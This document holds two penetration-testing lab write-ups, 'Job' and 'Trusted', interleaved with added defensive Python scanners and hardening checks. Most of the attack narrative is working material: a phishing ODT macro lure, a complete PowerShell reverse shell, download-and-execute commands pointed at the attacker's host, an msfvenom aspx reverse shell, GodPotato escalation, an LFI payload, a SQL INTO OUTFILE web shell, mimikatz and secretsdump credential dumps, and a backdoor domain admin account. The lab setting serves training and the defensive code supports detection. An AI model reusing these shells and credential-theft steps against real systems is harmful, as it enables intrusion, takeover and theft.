vulnlab-job

From Phishing to admin
Enrique A.
Tools used: sendemail, msfconsole, msfvenom, GodPotato

nmap scan

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-28T14:15:50+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-28T14:15:10+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2024-06-27T12:41:55
|_Not valid after:  2024-12-27T12:41:55
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-06-28T14:15:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds

cat /etc/hosts | grep job
10.10.114.36 job.local

The website shows one e-mail address: career@job.local

It also states that resumes must be sent as LibreOffice documents.

Phishing, try 1: getting some Windows hashes

First, generate an msf payload:

use auxiliary/fileformat/odt_badodt
set LHOST tun0
run

Then send a mail and catch the hash that comes back:

sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey http://10.8.2.138/test" -a bad.odt 
Jun 21 15:46:10 kali sendemail[162513]: Email was sent successfully!
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.99.156,51049)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:9b4c1be9c604bc2f1fdd46f203c4c1b3:010100000000000080f42a66e1c3da016f7c8cc4409768a80000000001001000640069004c004900700078006a00770003001000640069004c004900700078006a007700020010005500480078006a00430067004b007700040010005500480078006a00430067004b0077000700080080f42a66e1c3da0106000400020000000800300030000000000000000000000000200000f3afad144322c33a39d814751dfc312d1dd988dd18fbcedeab107cb49d9d84730a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.99.156,51049)
[*] Remaining connections []
[*] Incoming connection (10.10.99.156,51050)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] 

The hash could not be cracked with john and rockyou.txt.

Phishing seems to be the way to go, so this is what I did.

The following write-up gives a very good example of how to do this:

https://0xdf.gitlab.io/2020/02/01/htb-re.html

msf6 > set payload windows/x64/exec
payload => windows/x64/exec
msf6 > set LHOST 10.8.2.138
LHOST => 10.8.2.138
msf6 > set LPORT 80
LPORT => 80
msf6 > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');"
cmd => powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');

shell.txt

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cat shell.txt            
function cleanup {
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit
}
# Setup IPADDR
$address = '10.8.2.138'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
# Flush whatever cmd.exe printed at start-up (banner, prompt) to the socket
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
    if ($client.Connected -ne $true) {cleanup}
    $pos = 0; $i = 1
    # Read from the socket until a newline (byte 10) arrives or the buffer is full
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}
    }
    if ($pos -gt 0) {
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)
        start-sleep 1
        if ($process.ExitCode -ne $null) {cleanup}
        else {
            $out = $encoding.GetString($outputstream.Read())
            while($outputstream.Peek() -ne -1){
                $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}
            }
            $stream.Write($encoding.GetBytes($out),0,$out.length)
            $out = $null
            $string = $null
        }
    } else {cleanup}
}

msf6 exploit(multi/misc/openoffice_document_macro) > show options

Module options (exploit/multi/misc/openoffice_document_macro):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BODY                       no        The message for the document body
   FILENAME  msf.odt          yes       The OpenOffice Text document name
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                         local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (windows/x64/exec):

   Name      Current Setting                         Required  Description
   ----      ---------------                         --------  -----------
   CMD       powershell.exe -nop -w hidden -ep bypa  yes       The command string to execute
             ss -c IEX(New-Object Net.WebClient).Do
             wnloadString('http://10.8.2.138/shell.
             txt');
   EXITFUNC  thread                                  yes       Exit technique (Accepted: '', seh, thread, process, none)


Exploit target:

   Id  Name
   --  ----
   0   Apache OpenOffice on Windows (PSH)



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/openoffice_document_macro) > set srvport 80
srvport => 80
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Using URL: http://10.8.2.138/7Jnb1x3
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/puck/.msf4/local/msf.odt
exit
[*] Server stopped.
[*] Server stopped.
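Both lures in this write-up are ordinary ODT zip containers: the odt_badodt document carries a reference to a remote share that the viewer resolves when the file is opened, and the macro document carries the Basic/ library whose files the packaging output above lists (Basic/script-lc.xml, Basic/Standard/Module1.xml). A mail gateway or an IR analyst can triage a resume attachment on exactly those two signals. The scanner below is an added example, not code from this page or from Metasploit; the document it builds to exercise itself is a constructed minimal ODT with a placeholder TEST-NET host and an empty macro library, not the msf.odt generated above.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
ODT_MIME = "application/vnd.oasis.opendocument.text"
# hrefs that make a document viewer open a network connection when the object is
# accessed: UNC paths (\\host\share\...), smb:// URLs and file:// URLs with a host part.
REMOTE_REF = re.compile(r"^(\\\\[^\\]+\\|smb://|file://[^/])", re.IGNORECASE)


def scan_odt(data):
    """Inspect an ODT (a zip container) given as bytes; returns a findings dict."""
    result = {"mimetype": None, "macro_files": [], "remote_refs": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "mimetype" in names:
            result["mimetype"] = zf.read("mimetype").decode("ascii", "replace").strip()
        # Basic macro libraries are packaged under Basic/ (script-lc.xml, Standard/*.xml),
        # the same files the msf packaging output lists.
        result["macro_files"] = sorted(n for n in names if n.startswith("Basic/") and n.endswith(".xml"))
        for name in names:
            if name.startswith("Basic/") or not name.endswith(".xml"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue
            for el in root.iter():  # any element with an xlink:href pointing off-host
                href = el.get(XLINK_HREF)
                if href and REMOTE_REF.match(href):
                    result["remote_refs"].append((name, href))
    return result


def triage(result):
    """Human-readable reasons to hold the attachment; an empty list means nothing was found."""
    reasons = []
    if result["mimetype"] != ODT_MIME:
        reasons.append(f"unexpected mimetype {result['mimetype']!r}")
    if result["macro_files"]:
        reasons.append(f"embedded Basic macro library ({len(result['macro_files'])} files)")
    for name, href in result["remote_refs"]:
        reasons.append(f"{name} references a remote host: {href}")
    return reasons


def build_sample(macro=False, href=None):
    """Constructed minimal ODT used only to exercise the scanner (not a real document and
    not the Metasploit package): an optional empty macro library and one hyperlink."""
    link = f'<text:a xlink:type="simple" xlink:href="{href}">cv</text:a>' if href else ""
    content = (
        '<office:document-content '
        'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
        'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
        'xmlns:xlink="http://www.w3.org/1999/xlink">'
        f'<office:body><office:text><text:p>{link}</text:p></office:text></office:body>'
        '</office:document-content>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mimetype", ODT_MIME, compress_type=zipfile.ZIP_STORED)  # ODF: first, uncompressed
        zf.writestr("content.xml", content)
        if macro:
            zf.writestr("Basic/script-lc.xml",
                        '<library:libraries xmlns:library="http://openoffice.org/2000/library"/>')
            zf.writestr("Basic/Standard/Module1.xml",
                        '<script:module xmlns:script="http://openoffice.org/2000/script"/>')
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample(macro=True, href=r"\\203.0.113.10\share\cv.png")  # constructed TEST-NET host
    for reason in triage(scan_odt(sample)):
        print("HOLD:", reason)
```

Run it on a real attachment with `triage(scan_odt(open(path, "rb").read()))`. A document that only links to an https:// URL passes; the share reference and the macro library are the two properties that turn a CV into the lures used in this write-up, and neither has a legitimate reason to be in a resume.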

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cp /home/puck/.msf4/local/msf.odt .

Now the malicious ODT is downloaded:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:05:37] "GET /7Jnb1x3 HTTP/1.1" 200 -


┌──(puck㉿kali)-[~/vulnlab/job]
└─$ sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a msf.odt
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rm 7Jnb1x3
└─$ cp shell.txt 7Jnb1x3


Run it again:
sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138>
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

Now the shell is downloaded:
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:02:57] "GET /7Jnb1x3 HTTP/1.1" 200 -
10.10.114.36 - - [28/Jun/2024 10:04:02] "GET /7Jnb1x3 HTTP/1.1" 200 -


And we catch the shell as the user:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rlwrap nc -nlvp 443                  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 52139
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
job\jack.black

c:\Users\jack.black\Desktop>type user.txt
VL{0fa1<REDACTED>5dc1}
PS C:\inetpub\wwwroot> dir


    Directory: C:\inetpub\wwwroot


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        11/10/2021   8:52 PM                aspnet_client                                                        
d-----         11/9/2021   9:24 PM                assets                                                               
d-----         11/9/2021   9:24 PM                css                                                                  
d-----         11/9/2021   9:24 PM                js                                                                   
-a----        11/10/2021   9:01 PM            298 hello.aspx                                                           
-a----         11/7/2021   1:05 PM           3261 index.html                                                           


PS C:\inetpub\wwwroot> curl http://10.8.2.138/cmdasp.aspx -o cmdasp.aspx
PS C:\inetpub\wwwroot> curl http://10.8.2.138/reverse.aspx -o reverse.aspx


Privesc

After checking files and folders on this machine, I noticed that inetpub\wwwroot is writable, which lets us upload files to the website.

I created an aspx reverse shell with

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f aspx > reverse.aspx

and then ran curl http://job.local/reverse.aspx to get a new shell:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53689
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140720521084928
[*] DispatchTable: 0x140720523675512
[*] UseProtseqFunction: 0x140720522968944
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\a0c54595-80de-4e4f-a985-93a2101db089\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0854-ffff-ad4d-dae1b390a835
[*] DCOM obj OXID: 0x7374a001401060e1
[*] DCOM obj OID: 0x734f5c52566383ce
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3552

and we have an admin shell.

SeImpersonatePrivilege is enabled, so we used GodPotato:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53837
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{0102<REDACTED>5152}


That’s all. We now have an Admin reverse shell.


vulnlab-trusted

nmap

enum

gobuster dir -x php -w /usr/share/wordlists/dirb/big.txt -u http://10.10.146.246/dev/

http://lab.trusted.vl/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php

echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d  
<?php 
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>
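The view parameter in the URL above is handed straight to include(), so a php://filter wrapper turns the page include into a base64 read of db.php and hands over the database password. As an added example (not the site's code; the page root and the view names are assumptions of this example), here is that vulnerable lookup beside an allowlist-based one, written in Python to keep this page's examples in one language, with the exact payload from the URL above as input. The scheme and traversal checks are there to label the rejection in a log; the allowlist alone is what makes the lookup safe.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed layout for this example: legitimate view files live here, nothing else is includable.
PAGE_ROOT = "/srv/www/dev/pages"
ALLOWED_VIEWS = {"home", "news", "contact"}   # constructed allowlist
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def weak_resolve(raw):
    """What include($_GET['view']) receives when the parameter is used as-is:
    a PHP stream wrapper such as php://filter is passed through unchanged."""
    return unquote(raw)


def resolve_view(raw):
    """Hardened lookup: the parameter is mapped to a file only through an allowlist.
    Returns (path, None) on success or (None, reason) when rejected; the reason is
    meant for the application log, where 'php:' is an attack signal, not a typo."""
    value = unquote(raw)           # decode once, as the web server did for the query string
    if "\x00" in value:
        return None, "null byte"
    if SCHEME_RE.match(value):     # php://, data:, file:, expect:, zip:, ... (a C: drive path hits this too)
        return None, f"stream wrapper or URL scheme not allowed: {value.split(':', 1)[0]}"
    if "/" in value or "\\" in value or value in ("", ".", ".."):
        return None, "path separators or traversal"
    if value not in ALLOWED_VIEWS:
        return None, "view not in allowlist"
    return posixpath.join(PAGE_ROOT, value + ".php"), None


if __name__ == "__main__":
    payload = "php://filter/convert.base64-encode/resource=C:\\xampp\\htdocs\\dev\\db.php"
    print("weak   :", weak_resolve(payload))
    print("hardened:", resolve_view(payload))
    print("hardened:", resolve_view("news"))
```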

Upload a PHP shell (crackstation can crack Robert’s hash):

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ mysql -u root -h lab.trusted.vl -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 8
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use news
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bbef42f0fbfa3007b368def7 |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4df9325b502a02f11043e0ad |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.022 sec)
MariaDB [news]> select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php';
Query OK, 1 row affected (0.023 sec)

MariaDB [news]> exit
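The SELECT ... INTO OUTFILE above works because the root account used here holds the FILE privilege (it comes with ALL PRIVILEGES) and secure_file_priv does not restrict where the server may write, so a database credential found in db.php becomes a web shell in the DocumentRoot. Two checks a hardening review would run over the same setup, as an added example that is not from this page or from MariaDB: a my.ini audit of secure_file_priv against the web root, and a scan of SHOW GRANTS output for accounts that hold FILE on *.*. The my.ini fragments and grant lines in the demonstration are constructed.

```python
import configparser
import posixpath
import re

WEB_ROOT = "C:/xampp/htdocs"   # the DocumentRoot seen in the write-up; assumed for the check


def _norm(path):
    """Compare paths case-insensitively with forward slashes (Windows-style input)."""
    return posixpath.normpath(path.replace("\\", "/")).lower()


def audit_secure_file_priv(my_ini, web_root=WEB_ROOT):
    """Check the [mysqld] section of a my.ini/my.cnf for secure_file_priv.
    Returns a list of findings; empty means file export is restricted to a
    directory outside the web root (or disabled)."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    cp.optionxform = lambda key: key.lower().replace("-", "_")   # secure-file-priv == secure_file_priv
    cp.read_string(my_ini)
    if not cp.has_section("mysqld"):
        return ["no [mysqld] section found"]
    value = cp.get("mysqld", "secure_file_priv", fallback=None)
    value = "" if value is None else value.strip().strip("\"'")
    if value == "":
        # MariaDB default: no restriction, INTO OUTFILE may write anywhere the service account can
        return ["secure_file_priv unset/empty: SELECT ... INTO OUTFILE can write into the web root"]
    if value.upper() == "NULL":
        return []   # NULL disables file import/export entirely (MySQL semantics; confirm for your MariaDB)
    if _norm(value) == _norm(web_root) or _norm(value).startswith(_norm(web_root) + "/"):
        return [f"secure_file_priv {value!r} lies inside the web root {web_root!r}"]
    return []


GRANT_RE = re.compile(r"^GRANT (.+?) ON (\S+) TO ", re.IGNORECASE)


def audit_grants(show_grants_lines):
    """Return the SHOW GRANTS lines that give FILE (or ALL PRIVILEGES, which includes it) on *.*."""
    findings = []
    for line in show_grants_lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if m.group(2) == "*.*" and ("FILE" in privs or "ALL PRIVILEGES" in privs):
            findings.append(line.strip())
    return findings


if __name__ == "__main__":
    # constructed configs: one like a stock XAMPP layout, one hardened
    weak = "[mysqld]\nport=3306\ndatadir=\"C:/xampp/mysql/data\"\n"
    hardened = weak + "secure_file_priv=\"C:/xampp/mysql/export\"\n"
    print(audit_secure_file_priv(weak))
    print(audit_secure_file_priv(hardened))
    print(audit_grants(["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
                        "GRANT SELECT, INSERT ON `news`.* TO 'news'@'localhost'"]))
```

The second check is the one that matters for the web application: the site only needs SELECT/INSERT on the news database, and a dedicated account with those grants cannot run INTO OUTFILE no matter what secure_file_priv says.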

Trigger the shell:

http://lab.trusted.vl/dev/back.php?c=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/puckshell.txt');/

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.146.246 - - [26/Jun/2024 08:13:02] "GET /puckshell.txt HTTP/1.1" 200 -


┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.146.246] 64409
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\dev>whoami
nt authority\system

Get some more hashes:

C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

c:\temp>curl http://10.8.2.138/mimikatz.exe -o mimi.exe

C:\temp>mimi

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/


mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1685702 (00000000:0019b8c6)
Session           : Batch from 0
User Name         : cpowers
Domain            : LAB
Logon Server      : LABDC
Logon Time        : 6/26/2024 6:30:01 AM
SID               : S-1-5-21-2241985869-2159962460-1278545866-1107
    msv :	
     [00000003] Primary
     * Username : cpowers
     * Domain   : LAB
     * NTLM     : 322db798a55f85f09b3d61b976a13c43
     * SHA1     : e845d39122d58246ff7e28a282e8ed0e19ede373
     * DPAPI    : 01644e36ac919f8de1101ff9fde5a7fb
    tspkg :	
    wdigest :	
     * Username : cpowers
     * Domain   : LAB
     * Password : (null)
    kerberos :	
     * Username : cpowers
     * Domain   : LAB.TRUSTED.VL
     * Password : (null)
    ssp :	
    credman :	
    cloudap :	




mimikatz # exit
Bye!


Examine further:

C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

C:\temp>net user puck Passw0rd123! /add /domain
The command completed successfully.


C:\temp>net localgroup Administrators puck /add /domain
The command completed successfully.


C:\temp>

We can now also RDP to lab.trusted.vl:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ xfreerdp /v:10.10.250.102 /u:puck          
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - CN = labdc.lab.trusted.vl
Password: 


┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-secretsdump 'puck@lab.trusted.vl'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x68580865f85a4743db214876adf784df
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:86a9ee70dfd64d20992283dc5721b475:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
puck:2102:aad3b435b51404eeaad3b435b51404ee:ab4f5a5c42df5a0ee337d12ce77332f5:::
LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:61f6701481ff18844346b2f8ca47119a:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:88b2e30fba183f0fcdaba561a6ae64f5:::
[*] Kerberos keys grabbed


Then evil-winrm into lab.trusted.vl:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u puck -p Passw0rd123! -i lab.trusted.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\puck\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> whoami
lab\puck
*Evil-WinRM* PS C:\temp> . ./PowerView.ps1


At C:\temp\PowerView.ps1:

Forest                  : trusted.vl
DomainControllers       : {labdc.lab.trusted.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : trusted.vl
PdcRoleOwner            : labdc.lab.trusted.vl
RidRoleOwner            : labdc.lab.trusted.vl
InfrastructureRoleOwner : labdc.lab.trusted.vl
Name                    : lab.trusted.vl

Forest                  : trusted.vl
DomainControllers       :
Children                :
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            :
RidRoleOwner            :
InfrastructureRoleOwner :
Name                    : trusted.vl



